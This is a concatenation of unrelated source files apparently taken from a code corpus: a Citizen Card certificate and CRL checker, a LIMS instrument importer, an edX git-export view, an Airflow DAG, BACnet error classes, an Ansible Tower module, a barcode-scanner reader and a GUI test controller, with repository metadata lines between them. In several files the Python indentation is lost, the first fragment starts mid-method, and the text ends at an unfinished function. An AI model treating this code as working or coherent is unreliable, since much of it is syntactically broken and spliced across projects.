cert0 = certificates[0].as_text()
"""
        Substring to find BI in certificate
"""
p = cert0.find(BIprefix);
s = p + len(BIprefix)
bi = cert0[s:s+8]
return bi
#print "BI:" + bi
def certificate_chain_verify(self):
"""Verify if certificate chain is valid"""
certificates = self.certificates()
        verified_chain = True
"""
Tasks:
-Validate date
-Verify pubkey signatures
-Validate crl
"""
for i in range (0,4):
certificate = certificates[i]
public_key = certificates[i+1].get_pubkey()
task1 = self.validateCertificateDate(self.get_certificate_validity(certificate))
task2 = self.verify_certificate(certificate, public_key)
task3 = self.validate_crls(certificate)
            if not (task1 and task2 and task3):
                verified_chain = False
print verified_chain
return verified_chain
def validateCertificateDate(self,dates):
present = datetime.now(pytz.utc)
if present > dates[0] and present < dates[1]:
return True
else:
return False
def validate_crls(self,certificate):
"""
Validate CRL and CRL delta
"""
revcrl = self.revoked_certifications(self.get_crluri(), certificate)
revcrldelta = self.revoked_certifications(self.get_crldeltauri(),certificate)
if revcrl or revcrldelta:
return False
else:
return True
def revoked_certifications(self, crlString,certificate):
objects = self.session.findObjects()
revoked = False
uri = ''
path = re.search(crlString, certificate.as_text())
if path:
uri = path.groups()[0]
print uri
"""
Find CRL's URI
"""
#p = path.group().find(URIprefix);
#s = p + len(URIprefix)
#uri = path.group()[s:]
#print "uri:" + uri
# Gets content from CRL URI
        if path is not None:
crl = requests.request('GET',uri)
crl_object = OpenSSL.crypto.load_crl(OpenSSL.crypto.FILETYPE_ASN1, crl.content)
revoked_objects = crl_object.get_revoked()
if revoked_objects != None:
for rvk in revoked_objects:
print rvk.get_serial()
certSerial = certificate.get_serial_number()
if certSerial == rvk.get_serial():
revoked = True
#print self.get_certificate_serial(certificate)
#print (certSerial,rvk.get_serial())
#if rvk.get_serial() == certSerial:
# revoked = True
"""
TODO:
            Grab the serial number of the CC owner and check whether any of
            these revoked objects carries that serial. If one does, set
            revoked = True.
"""
return revoked
#except:
# return 'Error: Getting User Certificate'
#return revoked
def verify_certificate(self, certificate, public_key):
result = certificate.verify(public_key)
if result:
return True
else:
return False
def get_certificate_validity(self,certificate):
return (self.get_certificate_date_notBefore(certificate),self.get_certificate_date_notAfter(certificate))
def get_certificate_pKey(self, certificate):
return certificate.get_pubkey()
def get_certificate_pKey_text(self, certificate_object):
return certificate_object.get_pubkey().get_rsa().as_pem()
def get_certificate_date_notBefore(self, certificate_object):
return certificate_object.get_not_before().get_datetime()
def get_certificate_date_notAfter(self, certificate_object):
return certificate_object.get_not_after().get_datetime()
def get_certificate_subject_commonName(self, certificate_object):
return certificate_object.get_subject().commonName
def get_certificate_issuer_commonName(self, certificate_object):
return certificate_object.get_issuer().commonName
def get_crluri(self):
return r'X509v3 CRL Distribution Points:\s+Full Name:\s+URI:([^\s]+)'
def get_crldeltauri(self):
return r'X509v3 Freshest CRL:\s+Full Name:\s+URI:([^\s]+)'
def dump(src, length=8):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X" % ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length * 3, hexa, s)
N += length
return result
def hexx(intval):
x = hex(intval)[2:]
if (x[-1:].upper() == 'L'):
x = x[:-1]
if len(x) % 2 != 0:
return "0%s" % x
return x
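# Usage sketch (not part of the original module): the typical driving
# sequence, assuming a reader with a Citizen Card inserted and the
# libpteidpkcs11 library available on the system.
if __name__ == '__main__':
    handler = ccHandler()
    handler.openSession()          # prompts for the card PIN
    print "BI: " + handler.bi()    # civil identification number
    handler.sign()                 # signs the hard-coded challenge
    handler.verify()               # decrypts the signature with the public key
    print "Valid chain: %s" % handler.certificate_chain_verify()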
| gpl-2.0 | -8,252,353,066,543,728,000 | 31.055556 | 113 | 0.566821 | false |
veroc/Bika-LIMS | bika/lims/exportimport/instruments/alere/pima/beads.py | 4 | 2900 | """ Alere Pima "Beads"
"""
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from . import AlerePimaImporter, AlerePimaSLKParser
import json
import traceback
title = "Alere Pima Beads"
def Import(context, request):
""" Alere Pima Beads analysis results
"""
infile = request.form['alere_pima_beads_file']
fileformat = request.form['alere_pima_beads_format']
artoapply = request.form['alere_pima_beads_artoapply']
override = request.form['alere_pima_beads_override']
sample = request.form.get('alere_pima_beads_sample',
'requestid')
instrument = request.form.get('alere_pima_beads_instrument', None)
errors = []
logs = []
warns = []
# Load the most suitable parser according to file extension/options/etc...
parser = None
if not hasattr(infile, 'filename'):
errors.append(_("No file selected"))
if fileformat == 'slk':
parser = AlerePimaSLKParser(infile)
else:
errors.append(t(_("Unrecognized file format ${fileformat}",
mapping={"fileformat": fileformat})))
if parser:
# Load the importer
status = ['sample_received', 'attachment_due', 'to_be_verified']
if artoapply == 'received':
status = ['sample_received']
elif artoapply == 'received_tobeverified':
status = ['sample_received', 'attachment_due', 'to_be_verified']
over = [False, False]
if override == 'nooverride':
over = [False, False]
elif override == 'override':
over = [True, False]
elif override == 'overrideempty':
over = [True, True]
sam = ['getRequestID', 'getSampleID', 'getClientSampleID']
if sample == 'requestid':
sam = ['getRequestID']
        elif sample == 'sampleid':
sam = ['getSampleID']
elif sample == 'clientsid':
sam = ['getClientSampleID']
elif sample == 'sample_clientsid':
sam = ['getSampleID', 'getClientSampleID']
importer = AlerePimaImporter(parser=parser,
context=context,
idsearchcriteria=sam,
allowed_ar_states=status,
allowed_analysis_states=None,
override=over,
instrument_uid=instrument)
tbex = ''
try:
importer.process()
        except Exception:
tbex = traceback.format_exc()
errors = importer.errors
logs = importer.logs
warns = importer.warns
if tbex:
errors.append(tbex)
results = {'errors': errors, 'log': logs, 'warns': warns}
return json.dumps(results)
| agpl-3.0 | -3,365,620,268,281,323,000 | 34.365854 | 78 | 0.542414 | false |
philanthropy-u/edx-platform | cms/djangoapps/contentstore/views/export_git.py | 24 | 1723 | """
This view handles exporting the course XML to a git repository if
the giturl attribute is set.
"""
import logging
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import ensure_csrf_cookie
from opaque_keys.edx.keys import CourseKey
import contentstore.git_export_utils as git_export_utils
from edxmako.shortcuts import render_to_response
from student.auth import has_course_author_access
from xmodule.modulestore.django import modulestore
log = logging.getLogger(__name__)
@ensure_csrf_cookie
@login_required
def export_git(request, course_key_string):
"""
This method serves up the 'Export to Git' page
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_module = modulestore().get_course(course_key)
failed = False
log.debug('export_git course_module=%s', course_module)
msg = ""
if 'action' in request.GET and course_module.giturl:
if request.GET['action'] == 'push':
try:
git_export_utils.export_to_git(
course_module.id,
course_module.giturl,
request.user,
)
msg = _('Course successfully exported to git repository')
except git_export_utils.GitExportError as ex:
failed = True
msg = unicode(ex)
return render_to_response('export_git.html', {
'context_course': course_module,
'msg': msg,
'failed': failed,
})
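# Illustrative sketch (not part of this module): the view is typically wired
# into the CMS URL conf with a course key pattern along these lines; the
# exact pattern constant is an assumption, not taken from this file.
#
#   url(r'^export_git/{}$'.format(settings.COURSE_KEY_PATTERN),
#       export_git, name='export_git'),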
| agpl-3.0 | 7,384,989,849,531,216,000 | 30.327273 | 73 | 0.660476 | false |
nathanielvarona/airflow | airflow/providers/google/cloud/example_dags/example_compute_igm.py | 10 | 5537 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example Airflow DAG that uses IGM-type compute operations:
* copy of Instance Template
* update template in Instance Group Manager
This DAG relies on the following OS environment variables
* GCP_PROJECT_ID - the Google Cloud project where the Compute Engine instance exists
* GCE_ZONE - the zone where the Compute Engine instance exists
Variables for copy template operator:
* GCE_TEMPLATE_NAME - name of the template to copy
* GCE_NEW_TEMPLATE_NAME - name of the new template
* GCE_NEW_DESCRIPTION - description added to the template
Variables for update template in Group Manager:
* GCE_INSTANCE_GROUP_MANAGER_NAME - name of the Instance Group Manager
* SOURCE_TEMPLATE_URL - url of the template to replace in the Instance Group Manager
* DESTINATION_TEMPLATE_URL - url of the new template to set in the Instance Group Manager
"""
import os
from airflow import models
from airflow.providers.google.cloud.operators.compute import (
ComputeEngineCopyInstanceTemplateOperator,
ComputeEngineInstanceGroupUpdateManagerTemplateOperator,
)
from airflow.utils.dates import days_ago
GCP_PROJECT_ID = os.environ.get('GCP_PROJECT_ID', 'example-project')
GCE_ZONE = os.environ.get('GCE_ZONE', 'europe-west1-b')
# [START howto_operator_compute_template_copy_args]
GCE_TEMPLATE_NAME = os.environ.get('GCE_TEMPLATE_NAME', 'instance-template-test')
GCE_NEW_TEMPLATE_NAME = os.environ.get('GCE_NEW_TEMPLATE_NAME', 'instance-template-test-new')
GCE_NEW_DESCRIPTION = os.environ.get('GCE_NEW_DESCRIPTION', 'Test new description')
GCE_INSTANCE_TEMPLATE_BODY_UPDATE = {
"name": GCE_NEW_TEMPLATE_NAME,
"description": GCE_NEW_DESCRIPTION,
"properties": {"machineType": "n1-standard-2"},
}
# [END howto_operator_compute_template_copy_args]
# [START howto_operator_compute_igm_update_template_args]
GCE_INSTANCE_GROUP_MANAGER_NAME = os.environ.get('GCE_INSTANCE_GROUP_MANAGER_NAME', 'instance-group-test')
SOURCE_TEMPLATE_URL = os.environ.get(
'SOURCE_TEMPLATE_URL',
"https://www.googleapis.com/compute/beta/projects/"
+ GCP_PROJECT_ID
+ "/global/instanceTemplates/instance-template-test",
)
DESTINATION_TEMPLATE_URL = os.environ.get(
'DESTINATION_TEMPLATE_URL',
"https://www.googleapis.com/compute/beta/projects/"
+ GCP_PROJECT_ID
+ "/global/instanceTemplates/"
+ GCE_NEW_TEMPLATE_NAME,
)
UPDATE_POLICY = {
"type": "OPPORTUNISTIC",
"minimalAction": "RESTART",
"maxSurge": {"fixed": 1},
"minReadySec": 1800,
}
# [END howto_operator_compute_igm_update_template_args]
with models.DAG(
'example_gcp_compute_igm',
schedule_interval=None, # Override to match your needs
start_date=days_ago(1),
tags=['example'],
) as dag:
# [START howto_operator_gce_igm_copy_template]
gce_instance_template_copy = ComputeEngineCopyInstanceTemplateOperator(
project_id=GCP_PROJECT_ID,
resource_id=GCE_TEMPLATE_NAME,
body_patch=GCE_INSTANCE_TEMPLATE_BODY_UPDATE,
task_id='gcp_compute_igm_copy_template_task',
)
# [END howto_operator_gce_igm_copy_template]
# Added to check for idempotence
# [START howto_operator_gce_igm_copy_template_no_project_id]
gce_instance_template_copy2 = ComputeEngineCopyInstanceTemplateOperator(
resource_id=GCE_TEMPLATE_NAME,
body_patch=GCE_INSTANCE_TEMPLATE_BODY_UPDATE,
task_id='gcp_compute_igm_copy_template_task_2',
)
# [END howto_operator_gce_igm_copy_template_no_project_id]
# [START howto_operator_gce_igm_update_template]
gce_instance_group_manager_update_template = ComputeEngineInstanceGroupUpdateManagerTemplateOperator(
project_id=GCP_PROJECT_ID,
resource_id=GCE_INSTANCE_GROUP_MANAGER_NAME,
zone=GCE_ZONE,
source_template=SOURCE_TEMPLATE_URL,
destination_template=DESTINATION_TEMPLATE_URL,
update_policy=UPDATE_POLICY,
task_id='gcp_compute_igm_group_manager_update_template',
)
# [END howto_operator_gce_igm_update_template]
# Added to check for idempotence (and without UPDATE_POLICY)
# [START howto_operator_gce_igm_update_template_no_project_id]
gce_instance_group_manager_update_template2 = ComputeEngineInstanceGroupUpdateManagerTemplateOperator(
resource_id=GCE_INSTANCE_GROUP_MANAGER_NAME,
zone=GCE_ZONE,
source_template=SOURCE_TEMPLATE_URL,
destination_template=DESTINATION_TEMPLATE_URL,
task_id='gcp_compute_igm_group_manager_update_template_2',
)
# [END howto_operator_gce_igm_update_template_no_project_id]
gce_instance_template_copy >> gce_instance_template_copy2 >> gce_instance_group_manager_update_template
gce_instance_group_manager_update_template >> gce_instance_group_manager_update_template2
| apache-2.0 | 5,540,849,412,725,495,000 | 39.416058 | 107 | 0.737222 | false |
JoelBender/bacpypes | py27/bacpypes/errors.py | 3 | 8195 | #!/usr/bin/python
#
# ConfigurationError
#
class ConfigurationError(ValueError):
"""This error is raised when there is a configuration problem such as
bindings between layers or required parameters that are missing.
"""
def __init__(self, *args):
self.args = args
#
# EncodingError
#
class EncodingError(ValueError):
"""This error is raised if there is a problem during encoding.
"""
def __init__(self, *args):
self.args = args
#
# DecodingError
#
class DecodingError(ValueError):
"""This error is raised if there is a problem during decoding.
"""
def __init__(self, *args):
self.args = args
#
# ExecutionError
#
class ExecutionError(RuntimeError):
"""This error is raised for if there is an error during the execution of
a service or function at the application layer of stack and the error
translated into an ErrorPDU.
"""
def __init__(self, errorClass, errorCode):
self.errorClass = errorClass
self.errorCode = errorCode
self.args = (errorClass, errorCode)
#
# Reject Exception Family
#
class RejectException(Exception):
"""Exceptions in this family correspond to reject reasons. If the
application raises one of these errors while processing a confirmed
service request, the stack will form an appropriate RejectPDU and
send it to the client.
"""
rejectReason = None
def __init__(self, *args):
if not self.rejectReason:
raise NotImplementedError("use a derived class")
# save the args
self.args = args
class RejectOther(RejectException):
"""Generated in response to a confirmed request APDU that contains a
syntax error for which an error code has not been explicitly defined.
"""
rejectReason = 'other'
class RejectBufferOverflow(RejectException):
"""A buffer capacity has been exceeded.
"""
rejectReason = 'bufferOverflow'
class InconsistentParameters(RejectException):
"""Generated in response to a confirmed request APDU that omits a
conditional service argument that should be present or contains a
conditional service argument that should not be present. This condition
could also elicit a Reject PDU with a Reject Reason of INVALID_TAG.
"""
rejectReason = 'inconsistentParameters'
class InvalidParameterDatatype(RejectException):
"""Generated in response to a confirmed request APDU in which the encoding
of one or more of the service parameters does not follow the correct type
specification. This condition could also elicit a Reject PDU with a Reject
Reason of INVALID_TAG.
"""
rejectReason = 'invalidParameterDatatype'
class InvalidTag(RejectException):
"""While parsing a message, an invalid tag was encountered. Since an
invalid tag could confuse the parsing logic, any of the following Reject
Reasons may also be generated in response to a confirmed request
containing an invalid tag: INCONSISTENT_PARAMETERS,
INVALID_PARAMETER_DATA_TYPE, MISSING_REQUIRED_PARAMETER, and
TOO_MANY_ARGUMENTS.
"""
rejectReason = 'invalidTag'
class MissingRequiredParameter(RejectException):
"""Generated in response to a confirmed request APDU that is missing at
least one mandatory service argument. This condition could also elicit a
Reject PDU with a Reject Reason of INVALID_TAG.
"""
rejectReason = 'missingRequiredParameter'
class ParameterOutOfRange(RejectException):
"""Generated in response to a confirmed request APDU that conveys a
parameter whose value is outside the range defined for this service.
"""
rejectReason = 'parameterOutOfRange'
class TooManyArguments(RejectException):
"""Generated in response to a confirmed request APDU in which the total
number of service arguments is greater than specified for the service.
This condition could also elicit a Reject PDU with a Reject Reason of
INVALID_TAG.
"""
rejectReason = 'tooManyArguments'
class UndefinedEnumeration(RejectException):
"""Generated in response to a confirmed request APDU in which one or
more of the service parameters is decoded as an enumeration that is not
defined by the type specification of this parameter.
"""
rejectReason = 'undefinedEnumeration'
class UnrecognizedService(RejectException):
"""Generated in response to a confirmed request APDU in which the Service
Choice field specifies an unknown or unsupported service.
"""
rejectReason = 'unrecognizedService'
#
# Abort Exception Family
#
class AbortException(Exception):
"""Exceptions in this family correspond to abort reasons. If the
application raises one of these errors while processing a confirmed
service request, the stack will form an appropriate AbortPDU and
send it to the client.
"""
abortReason = None
def __init__(self, *args):
if not self.abortReason:
raise NotImplementedError("use a derived class")
# save the args
self.args = args
class AbortOther(AbortException):
"""This abort reason is returned for a reason other than any of those
for which an error code has not been explicitly defined.
"""
abortReason = 'other'
class AbortBufferOverflow(AbortException):
"""A buffer capacity has been exceeded.
"""
abortReason = 'bufferOverflow'
class InvalidAPDUInThisState(AbortException):
"""Generated in response to an APDU that is not expected in the present
state of the Transaction State Machine.
"""
abortReason = 'invalidApduInThisState'
class PreemptedByHigherPriorityTask(AbortException):
"""The transaction shall be aborted to permit higher priority processing.
"""
abortReason = 'preemptedByHigherPriorityTask'
class SegmentationNotSupported(AbortException):
"""Generated in response to an APDU that has its segmentation bit set to
TRUE when the receiving device does not support segmentation. It is also
generated when a BACnet-ComplexACK-PDU is large enough to require
segmentation but it cannot be transmitted because either the transmitting
device or the receiving device does not support segmentation.
"""
abortReason = 'segmentationNotSupported'
class SecurityError(AbortException):
"""The Transaction is aborted due to receipt of a security error.
"""
abortReason = 'securityError'
class InsufficientSecurity(AbortException):
"""The transaction is aborted due to receipt of a PDU secured differently
than the original PDU of the transaction.
"""
abortReason = 'insufficientSecurity'
class WindowSizeOutOfRange(AbortException):
"""A device receives a request that is segmented, or receives any segment
of a segmented request, where the Proposed Window Size field of the PDU
header is either zero or greater than 127.
"""
abortReason = 'windowSizeOutOfRange'
class ApplicationExceededReplyTime(AbortException):
"""A device receives a confirmed request but its application layer has not
responded within the published APDU Timeout period.
"""
abortReason = 'applicationExceededReplyTime'
class OutOfResources(AbortException):
"""A device receives a request but cannot start processing because it has
run out of some internal resource.
"""
abortReason = 'outOfResources'
class TSMTimeout(AbortException):
"""A transaction state machine timer exceeded the timeout applicable for
the current state, causing the transaction machine to abort the
transaction.
"""
abortReason = 'tsmTimeout'
class APDUTooLong(AbortException):
"""An APDU was received from the local application program whose overall
size exceeds the maximum transmittable length or exceeds the maximum number
of segments accepted by the server.
"""
abortReason = 'apduTooLong'
class ServerTimeout(AbortException):
"""BACpypes specific.
"""
abortReason = 'serverTimeout'
class NoResponse(AbortException):
"""BACpypes specific.
"""
abortReason = 'noResponse'
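# Usage sketch (not part of the original module): a confirmed service
# handler raises one of these exceptions and lets the stack translate it
# into the matching Error, Reject, or Abort APDU. The handler below is
# hypothetical, and the 'object'/'unknownObject' values are assumed BACnet
# error class/code names.
def _example_service_handler(apdu):
    if apdu is None:
        raise MissingRequiredParameter("an APDU is required")
    if getattr(apdu, 'priority', 1) not in range(1, 17):
        raise ParameterOutOfRange("priority must be between 1 and 16")
    # anything application specific maps to an ErrorPDU
    raise ExecutionError('object', 'unknownObject')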
| mit | 5,787,790,787,145,688,000 | 24.138037 | 79 | 0.719707 | false |
dcloud/marvelous | marvelous/tests/test_marvel_events.py | 1 | 1968 | from marvelous.tests.base import MarvelTests
from betamax import Betamax
class TestMarvelEvents(MarvelTests):
def test_event_by_id(self):
with Betamax(self.api._session).use_cassette('age_of_ultron_event'):
result = self.api.event(self.age_of_ultron_event)
self.assertIsInstance(result, dict)
def test_event_missing_id(self):
with self.assertRaises(TypeError):
self.api.event()
def test_events_characters(self):
with Betamax(self.api._session).use_cassette('events_characters'):
results = self.api.events_characters(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_comics(self):
with Betamax(self.api._session).use_cassette('events_comics'):
results = self.api.events_comics(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_creators(self):
with Betamax(self.api._session).use_cassette('events_creators'):
results = self.api.events_creators(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_series(self):
with Betamax(self.api._session).use_cassette('events_series'):
results = self.api.events_series(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
def test_events_stories(self):
with Betamax(self.api._session).use_cassette('events_stories'):
results = self.api.events_stories(self.age_of_ultron_event)
self.assertIsInstance(results, list)
self.assertEqual(len(results), results._meta['data']['count'])
| bsd-2-clause | 6,991,969,294,185,304,000 | 43.727273 | 76 | 0.653963 | false |
sogelink/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_team.py | 34 | 3468 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: tower_team
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: create, update, or destroy Ansible Tower team.
description:
- Create, update, or destroy Ansible Tower teams. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- Name to use for the team.
required: True
default: null
organization:
description:
- Organization the team should be made a member of.
required: True
default: null
state:
description:
- Desired state of the resource.
required: False
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Create tower team
tower_team:
name: Team Name
description: Team Description
organization: test-org
state: present
tower_config_file: "~/tower_cli.cfg"
'''
from ansible.module_utils.ansible_tower import tower_argument_spec, tower_auth_config, tower_check_mode, HAS_TOWER_CLI
try:
import tower_cli
import tower_cli.utils.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
argument_spec = tower_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
description=dict(),
organization=dict(required=True),
state=dict(choices=['present', 'absent'], default='present'),
))
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
if not HAS_TOWER_CLI:
module.fail_json(msg='ansible-tower-cli required for this module')
name = module.params.get('name')
description = module.params.get('description')
organization = module.params.get('organization')
state = module.params.get('state')
json_output = {'team': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
team = tower_cli.get_resource('team')
try:
org_res = tower_cli.get_resource('organization')
org = org_res.get(name=organization)
if state == 'present':
result = team.modify(name=name, organization=org['id'],
description=description, create_on_missing=True)
json_output['id'] = result['id']
elif state == 'absent':
result = team.delete(name=name, organization=org['id'])
except (exc.NotFound) as excinfo:
module.fail_json(msg='Failed to update team, organization not found: {0}'.format(excinfo), changed=False)
except (exc.ConnectionError, exc.BadRequest, exc.NotFound) as excinfo:
module.fail_json(msg='Failed to update team: {0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
from ansible.module_utils.basic import AnsibleModule
if __name__ == '__main__':
main()
| gpl-3.0 | -7,191,851,142,042,355,000 | 29.156522 | 118 | 0.637543 | false |
cfangmeier/Project_Scorpion | src/scorpion/hal/scanner.py | 1 | 1944 | '''
Created on Feb 15, 2014
@author: caleb
'''
import struct
import os
import re
import select
import threading
from queue import Queue
from scorpion.config import scanner_path, use_gui
import scorpion.ui.ui_main
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
scanner_data = Queue()
_mapping = {11: '0', 2 : '1', 3 : '2',
4 : '3', 5 : '4', 6 : '5',
7 : '6', 8 : '7', 9 : '8',
10: '9', 28: '\0'}
_scanner_file = None
_scanner_thread = None
kill_flag = False
def init_scanner():
global _scanner_file, _scanner_thread
    if not os.path.exists(scanner_path):
print("ERROR: barcode scanner not found")
return
#disconnect scanner from x-input so scans
#aren't fed to wherever the cursor is
event_path = os.readlink(scanner_path)
event_id = re.findall('[0-9]+$',event_path)[-1]
os.system("xinput float " + event_id)
_scanner_file = open(scanner_path, "rb")
_scanner_thread = threading.Thread(target=_run)
_scanner_thread.start()
def _run():
global scanner_data
while True:
if kill_flag: return
(rlist,_,_) = select.select([_scanner_file],[],[],0.5)
if len(rlist) == 0: continue
reading = []
event = _scanner_file.read(EVENT_SIZE)
while event:
(_, _, type_, code, value) = struct.unpack(FORMAT, event)
if type_ == 1 and value == 1:
if _mapping[code] == '\0':
_scanner_file.read(EVENT_SIZE)
_scanner_file.read(EVENT_SIZE)
break
reading.append(_mapping[code])
event = _scanner_file.read(EVENT_SIZE)
scanner_data.put(''.join(reading))
if use_gui:
scorpion.ui.ui_main.set_upc(scanner_data.get())
def stop_scanner():
global kill_flag, _scanner_thread
kill_flag = True
    if _scanner_thread is not None:
_scanner_thread.join()
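# Usage sketch (not part of the original module): consume barcodes pushed
# onto scanner_data by the reader thread, assuming use_gui is disabled in
# scorpion.config.
if __name__ == '__main__':
    init_scanner()
    try:
        upc = scanner_data.get(timeout=30)  # blocks until a scan arrives
        print("Scanned UPC:", upc)
    finally:
        stop_scanner()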
| gpl-2.0 | 4,108,641,824,097,425,000 | 27.188406 | 69 | 0.572531 | false |
r0jsik/rinde | test/stage/__init__.py | 1 | 6341 | from rinde.stage import ControllerBase
from rinde.stage.node.switch import RadioSwitch
from rinde.stage.node.pane import Pane
from rinde.stage.node.text import Text
from rinde.stage.node.util import Canvas
from rinde.stage.node.util import Image
class Controller(ControllerBase):
def __lookup_element(self, node_id, selector):
return self.nodes[node_id].lookup_element(selector)
def start(self):
self.__test_boundary()
self.__test_password_field()
self.__test_text_field()
self.__test_check_switch()
self.__test_radio_switch()
self.__test_pane()
self.__test_slider()
self.__test_canvas_view()
self.__test_image_view()
self.__test_pages()
self.__test_choice_box()
self.__test_list_view()
self.__test_text_area()
self.__test_text_flow()
def __test_boundary(self):
boundary_1 = self.nodes["Boundary-1"]
boundary_2 = self.nodes["Boundary-2"]
assert boundary_1.absolute_position() == (17, 9)
assert boundary_1.absolute_size() == (49, 54)
assert boundary_2.absolute_position() == (41, 31)
assert boundary_2.absolute_size() == (4, 4)
boundary_1["padding"] = 1, 2, 3, 4
assert boundary_1.absolute_position() == (17, 9)
assert boundary_1.absolute_size() == (43, 42)
boundary_2["margin"] = 4, 3, 2, 1
assert boundary_2.absolute_position() == (23, 20)
assert boundary_2.absolute_size() == (4, 4)
def __test_password_field(self):
assert self.nodes["PasswordField-1"]["text"] == ""
assert self.nodes["PasswordField-1"]["content-text"] == ""
self.nodes["PasswordField-1"]["text"] = "correct"
assert self.nodes["PasswordField-1"]["text"] == "correct"
assert self.nodes["PasswordField-1"]["content-text"] == "*******"
def __test_text_field(self):
assert self.nodes["TextField-1"]["text"] == ""
assert self.nodes["TextField-1"]["content-text"] == ""
self.nodes["TextField-1"]["text"] = "correct"
assert self.nodes["TextField-1"]["text"] == "correct"
assert self.nodes["TextField-1"]["content-text"] == "correct"
def __test_check_switch(self):
assert self.nodes["CheckSwitch"]["selected"] is False
self.nodes["CheckSwitch"].click()
assert self.nodes["CheckSwitch"]["selected"] is True
def __test_radio_switch(self):
radio_switch_1 = self.nodes["RadioSwitch-1"]
radio_switch_2 = self.nodes["RadioSwitch-2"]
assert radio_switch_1["selected"] is True
assert radio_switch_2["selected"] is False
radio_switch_2.click()
assert radio_switch_1["selected"] is False
assert radio_switch_2["selected"] is True
radio_switch_3 = RadioSwitch(self.groups["RadioSwitch"], "3", selected=True)
assert radio_switch_1["selected"] is False
assert radio_switch_2["selected"] is False
assert radio_switch_3["selected"] is True
def __test_pane(self):
pane = self.nodes["Pane"]
text = Text()
subpane = Pane()
pane.insert_node(subpane)
assert text["font-size"] == 0
assert subpane in pane.children()
subpane.insert_node(text)
assert text["font-size"] != 0
assert text in subpane.children()
pane.remove_node(subpane)
assert subpane not in pane.children()
def __test_slider(self):
slider = self.nodes["Slider-1"]
slider["value"] = 200
assert slider["value"] == 100
slider["value"] = -10
assert slider["value"] == 0
slider["value"] = 200
assert slider["value"] == 100
self.nodes["Slider-3"]["value"] = 200
self.nodes["Slider-3"]["range"] = 150
def __test_canvas_view(self):
canvas_view = self.nodes["CanvasView"]
assert canvas_view.absolute_size() == (256, 256)
canvas = Canvas(128, 64)
canvas_view.set_canvas(canvas)
canvas.fill(0, 255, 255)
assert canvas_view.absolute_size() == (128, 64)
def __test_image_view(self):
image_view = self.nodes["ImageView"]
image = Image("res/test_2.png")
assert image_view.absolute_size() == (128, 128)
image_view.set_image(image)
assert image_view.absolute_size() == (256, 256)
def __test_pages(self):
self.groups["module"].select("button")
self.__assert_only_visible_page("button")
self.groups["module"].select("input")
self.__assert_only_visible_page("input")
self.groups["module"].select(None)
def __assert_only_visible_page(self, name):
for node in self.nodes["Pages"].children():
assert node["visible"] == False or node == name
assert self.groups["module"] == name
def __test_choice_box(self):
disposer = self.__lookup_element("ChoiceBox", "disposer")
self.nodes["ChoiceBox"]["placeholder"] = "Select option..."
assert disposer.placeholded_text["text"] == "Option 2"
self.nodes["ChoiceBox"].remove_option("option_2")
assert disposer.placeholded_text["text"] == ""
self.groups["ChoiceBox"].add_trigger(self.__page_selected)
self.groups["ChoiceBox"].select("button")
def __page_selected(self):
module = self.groups["ChoiceBox"].get_selected_name()
self.groups["module"].select(module)
def __test_list_view(self):
self.nodes["ListView"].insert_option("Option 0", "option_0", index=0)
assert self.groups["ListView"] == "option_3"
self.nodes["ListView"].remove_option("option_3")
assert self.groups["ListView"].get_selected_name() is None
self.nodes["ListView"].insert_option("Option 4", "option_4", True, 3)
assert self.groups["ListView"] == "option_4"
def __test_text_area(self):
self.nodes["TextArea"]["text"] = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec tempor dapibus condimentum. Donec a malesuada ex, quis posuere nisl. Curabitur a molestie est, a aliquet enim. Integer sit amet nulla in mauris rhoncus tempor id ut tortor."
def __test_text_flow(self):
self.nodes["TextFlow"]["text"] = "Lorem ipsum dolor sit amet, consectetur adipiscing elit.\nDonec tempor dapibus condimentum.\nDonec a malesuada ex, quis posuere nisl.\nCurabitur a molestie est, a aliquet enim.\nInteger sit amet nulla in mauris rhoncus tempor id ut tortor.\nUt eu enim id tortor iaculis volutpat.\nMaecenas metus nulla, tristique a leo a, sollicitudin mollis leo.\nMorbi lorem erat, euismod et mauris sed, congue eleifend arcu."
def action_1(self):
